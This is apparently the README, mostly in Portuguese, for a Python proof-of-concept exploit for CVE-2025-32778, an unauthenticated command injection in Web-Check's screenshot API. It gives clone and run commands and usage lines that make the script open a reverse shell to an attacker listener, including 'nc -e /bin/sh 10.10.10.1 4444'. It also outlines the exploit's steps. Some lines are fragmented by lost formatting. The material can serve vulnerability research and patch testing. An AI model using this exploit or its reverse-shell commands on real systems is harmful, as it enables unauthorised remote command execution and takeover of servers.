
PoC exploit for CVE-2025-32778: command injection in Web-Check OSINT tool
CVE-2025-32778 é uma vulnerabilidade crítica de injeção de comandos na ferramenta OSINT Web-Check de Lissy93.
Permite que atacantes não autenticados executem comandos arbitrários do sistema através do parâmetro url na API de captura de tela.
Este script Python automatiza a exploração e pode gerar shells reversos ou aceitar payloads de shell personalizados.
url no Web-Check.--lhost e --lport.--shell.--shell com --lhost/--lport.pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
Normalizar a URL alvo para scheme://host[:port].
Preparar o payload:
--lhost e --lport.--shell.Codificar o payload do shell para injeção segura na URL.
Enviar uma requisição HTTP GET para /api/screenshot/ com o payload.
Aguardar a conexão do shell reverso.
00xCanelo
Perfil no GitHub